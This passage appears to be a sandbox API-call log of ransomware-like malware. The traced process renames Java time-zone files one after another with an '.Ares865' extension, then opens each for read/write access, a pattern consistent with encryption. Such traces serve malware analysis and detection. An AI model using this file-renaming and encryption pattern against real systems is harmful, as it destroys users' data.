(x86)\\Java\\jre7\\lib\\zi\\America\\Maceio.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\maceio.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.419] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=393) returned 1 [0135.422] lstrcpyW (in: lpString1=0x2cce460, lpString2="Managua" | out: lpString1="Managua") returned="Managua" [0135.422] lstrlenW (lpString="Managua") returned 7 [0135.422] lstrlenW (lpString="Ares865") returned 7 [0135.423] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Managua.Ares865") returned 63 [0135.423] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Managua" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\managua"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Managua.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\managua.ares865"), dwFlags=0x1) returned 1 [0135.424] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Managua.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\managua.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.425] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=185) returned 1 [0135.428] lstrcpyW (in: lpString1=0x2cce460, lpString2="Manaus" | out: lpString1="Manaus") returned="Manaus" [0135.428] lstrlenW (lpString="Manaus") returned 6 [0135.428] lstrlenW (lpString="Ares865") returned 7 [0135.428] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Manaus.Ares865") returned 62 [0135.428] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Manaus" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\manaus"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Manaus.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\manaus.ares865"), dwFlags=0x1) returned 1 [0135.430] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Manaus.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\manaus.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.430] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=313) returned 1 [0135.433] lstrcpyW (in: lpString1=0x2cce460, lpString2="Martinique" | out: lpString1="Martinique") returned="Martinique" [0135.433] lstrlenW (lpString="Martinique") returned 10 [0135.433] lstrlenW (lpString="Ares865") returned 7 [0135.433] lstrcmpiW (lpString1="tinique", lpString2="Ares865") returned 1 [0135.433] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Martinique.Ares865") returned 66 [0135.433] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Martinique" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\martinique"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Martinique.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\martinique.ares865"), dwFlags=0x1) returned 1 [0135.435] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Martinique.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\martinique.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.435] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=89) returned 1 [0135.439] lstrcpyW (in: lpString1=0x2cce460, lpString2="Matamoros" | out: lpString1="Matamoros") returned="Matamoros" [0135.439] lstrlenW (lpString="Matamoros") returned 9 [0135.439] lstrlenW (lpString="Ares865") returned 7 [0135.439] lstrcmpiW (lpString1="tamoros", lpString2="Ares865") returned 1 [0135.439] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Matamoros.Ares865") returned 65 [0135.439] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Matamoros" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\matamoros"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Matamoros.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\matamoros.ares865"), dwFlags=0x1) returned 1 [0135.440] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Matamoros.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\matamoros.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.440] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=788) returned 1 [0135.443] lstrcpyW (in: lpString1=0x2cce460, lpString2="Mazatlan" | out: lpString1="Mazatlan") returned="Mazatlan" [0135.443] lstrlenW (lpString="Mazatlan") returned 8 [0135.443] lstrlenW (lpString="Ares865") returned 7 [0135.443] lstrcmpiW (lpString1="azatlan", lpString2="Ares865") returned 1 [0135.444] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Mazatlan.Ares865") returned 64 [0135.444] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Mazatlan" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\mazatlan"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Mazatlan.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\mazatlan.ares865"), dwFlags=0x1) returned 1 [0135.445] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Mazatlan.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\mazatlan.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.445] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=840) returned 1 [0135.448] lstrcpyW (in: lpString1=0x2cce460, lpString2="Menominee" | out: lpString1="Menominee") returned="Menominee" [0135.448] lstrlenW (lpString="Menominee") returned 9 [0135.448] lstrlenW (lpString="Ares865") returned 7 [0135.448] lstrcmpiW (lpString1="nominee", lpString2="Ares865") returned 1 [0135.448] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Menominee.Ares865") returned 65 [0135.448] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Menominee" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\menominee"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Menominee.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\menominee.ares865"), dwFlags=0x1) returned 1 [0135.450] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Menominee.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\menominee.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.450] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1216) returned 1 [0135.453] lstrcpyW (in: lpString1=0x2cce460, lpString2="Merida" | out: lpString1="Merida") returned="Merida" [0135.453] lstrlenW (lpString="Merida") returned 6 [0135.453] lstrlenW (lpString="Ares865") returned 7 [0135.453] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Merida.Ares865") returned 62 [0135.453] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Merida" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\merida"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Merida.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\merida.ares865"), dwFlags=0x1) returned 1 [0135.455] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Merida.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\merida.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.455] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=788) returned 1 [0135.457] lstrcpyW (in: lpString1=0x2cce460, lpString2="Metlakatla" | out: lpString1="Metlakatla") returned="Metlakatla" [0135.457] lstrlenW (lpString="Metlakatla") returned 10 [0135.458] lstrlenW (lpString="Ares865") returned 7 [0135.458] lstrcmpiW (lpString1="lakatla", lpString2="Ares865") returned 1 [0135.458] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Metlakatla.Ares865") returned 66 [0135.458] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Metlakatla" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\metlakatla"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Metlakatla.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\metlakatla.ares865"), dwFlags=0x1) returned 1 [0135.459] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Metlakatla.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\metlakatla.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.459] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=329) returned 1 [0135.463] lstrcpyW (in: lpString1=0x2cce460, lpString2="Mexico_City" | out: lpString1="Mexico_City") returned="Mexico_City" [0135.463] lstrlenW (lpString="Mexico_City") returned 11 [0135.463] lstrlenW (lpString="Ares865") returned 7 [0135.463] lstrcmpiW (lpString1="co_City", lpString2="Ares865") returned 1 [0135.463] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Mexico_City.Ares865") returned 67 [0135.463] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Mexico_City" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\mexico_city"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Mexico_City.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\mexico_city.ares865"), dwFlags=0x1) returned 1 [0135.464] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Mexico_City.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\mexico_city.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.464] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=880) returned 1 [0135.467] lstrcpyW (in: lpString1=0x2cce460, lpString2="Miquelon" | out: lpString1="Miquelon") returned="Miquelon" [0135.467] lstrlenW (lpString="Miquelon") returned 8 [0135.467] lstrlenW (lpString="Ares865") returned 7 [0135.467] lstrcmpiW (lpString1="iquelon", lpString2="Ares865") returned 1 [0135.468] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Miquelon.Ares865") returned 64 [0135.468] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Miquelon" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\miquelon"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Miquelon.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\miquelon.ares865"), dwFlags=0x1) returned 1 [0135.469] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Miquelon.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\miquelon.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.469] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=928) returned 1 [0135.472] lstrcpyW (in: lpString1=0x2cce460, lpString2="Moncton" | out: lpString1="Moncton") returned="Moncton" [0135.472] lstrlenW (lpString="Moncton") returned 7 [0135.472] lstrlenW (lpString="Ares865") returned 7 [0135.472] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Moncton.Ares865") returned 63 [0135.472] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Moncton" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\moncton"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Moncton.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\moncton.ares865"), dwFlags=0x1) returned 1 [0135.474] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Moncton.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\moncton.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.474] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1732) returned 1 [0135.477] lstrcpyW (in: lpString1=0x2cce460, lpString2="Monterrey" | out: lpString1="Monterrey") returned="Monterrey" [0135.477] lstrlenW (lpString="Monterrey") returned 9 [0135.477] lstrlenW (lpString="Ares865") returned 7 [0135.477] lstrcmpiW (lpString1="nterrey", lpString2="Ares865") returned 1 [0135.477] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Monterrey.Ares865") returned 65 [0135.477] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Monterrey" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\monterrey"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Monterrey.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\monterrey.ares865"), dwFlags=0x1) returned 1 [0135.479] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Monterrey.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\monterrey.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.479] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=788) returned 1 [0135.482] lstrcpyW (in: lpString1=0x2cce460, lpString2="Montevideo" | out: lpString1="Montevideo") returned="Montevideo" [0135.482] lstrlenW (lpString="Montevideo") returned 10 [0135.482] lstrlenW (lpString="Ares865") returned 7 [0135.482] lstrcmpiW (lpString1="tevideo", lpString2="Ares865") returned 1 [0135.482] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Montevideo.Ares865") returned 66 [0135.482] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Montevideo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\montevideo"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Montevideo.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\montevideo.ares865"), dwFlags=0x1) returned 1 [0135.484] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Montevideo.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\montevideo.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.484] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1152) returned 1 [0135.487] lstrcpyW (in: lpString1=0x2cce460, lpString2="Montreal" | out: lpString1="Montreal") returned="Montreal" [0135.487] lstrlenW (lpString="Montreal") returned 8 [0135.487] lstrlenW (lpString="Ares865") returned 7 [0135.487] lstrcmpiW (lpString1="ontreal", lpString2="Ares865") returned 1 [0135.487] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Montreal.Ares865") returned 64 [0135.487] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Montreal" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\montreal"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Montreal.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\montreal.ares865"), dwFlags=0x1) returned 1 [0135.489] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Montreal.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\montreal.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.489] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1928) returned 1 [0135.492] lstrcpyW (in: lpString1=0x2cce460, lpString2="Montserrat" | out: lpString1="Montserrat") returned="Montserrat" [0135.492] lstrlenW (lpString="Montserrat") returned 10 [0135.492] lstrlenW (lpString="Ares865") returned 7 [0135.492] lstrcmpiW (lpString1="tserrat", lpString2="Ares865") returned 1 [0135.492] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Montserrat.Ares865") returned 66 [0135.492] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Montserrat" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\montserrat"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Montserrat.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\montserrat.ares865"), dwFlags=0x1) returned 1 [0135.494] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Montserrat.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\montserrat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.494] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0135.497] lstrcpyW (in: lpString1=0x2cce460, lpString2="Nassau" | out: lpString1="Nassau") returned="Nassau" [0135.497] lstrlenW (lpString="Nassau") returned 6 [0135.497] lstrlenW (lpString="Ares865") returned 7 [0135.497] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Nassau.Ares865") returned 62 [0135.497] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Nassau" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\nassau"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Nassau.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\nassau.ares865"), dwFlags=0x1) returned 1 [0135.499] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Nassau.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\nassau.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.499] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1284) returned 1 [0135.502] lstrcpyW (in: lpString1=0x2cce460, lpString2="New_York" | out: lpString1="New_York") returned="New_York" [0135.502] lstrlenW (lpString="New_York") returned 8 [0135.502] lstrlenW (lpString="Ares865") returned 7 [0135.502] lstrcmpiW (lpString1="ew_York", lpString2="Ares865") returned 1 [0135.502] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\New_York.Ares865") returned 64 [0135.502] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\New_York" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\new_york"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\New_York.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\new_york.ares865"), dwFlags=0x1) returned 1 [0135.504] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\New_York.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\new_york.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.504] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1960) returned 1 [0135.506] lstrcpyW (in: lpString1=0x2cce460, lpString2="Nipigon" | out: lpString1="Nipigon") returned="Nipigon" [0135.507] lstrlenW (lpString="Nipigon") returned 7 [0135.507] lstrlenW (lpString="Ares865") returned 7 [0135.507] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Nipigon.Ares865") returned 63 [0135.507] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Nipigon" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\nipigon"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Nipigon.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\nipigon.ares865"), dwFlags=0x1) returned 1 [0135.508] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Nipigon.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\nipigon.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.508] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1144) returned 1 [0135.511] lstrcpyW (in: lpString1=0x2cce460, lpString2="Nome" | out: lpString1="Nome") returned="Nome" [0135.511] lstrlenW (lpString="Nome") returned 4 [0135.511] lstrlenW (lpString="Ares865") returned 7 [0135.517] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Nome.Ares865") returned 60 [0135.517] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Nome" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\nome"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Nome.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\nome.ares865"), dwFlags=0x1) returned 1 [0135.519] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Nome.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\nome.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.519] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1228) returned 1 [0135.522] lstrcpyW (in: lpString1=0x2cce460, lpString2="Noronha" | out: lpString1="Noronha") returned="Noronha" [0135.522] lstrlenW (lpString="Noronha") returned 7 [0135.522] lstrlenW (lpString="Ares865") returned 7 [0135.522] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Noronha.Ares865") returned 63 [0135.523] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Noronha" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\noronha"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Noronha.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\noronha.ares865"), dwFlags=0x1) returned 1 [0135.524] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Noronha.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\noronha.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.524] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=377) returned 1 [0135.527] lstrcpyW (in: lpString1=0x2cce460, lpString2="North_Dakota" | out: lpString1="North_Dakota") returned="North_Dakota" [0135.527] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c28 [0135.527] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7a) returned 0x2f00d8 [0135.527] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c30 | out: ListHead=0x2e7710, ListEntry=0x2e7c30) returned 0x2e7b90 [0135.527] FindNextFileW (in: 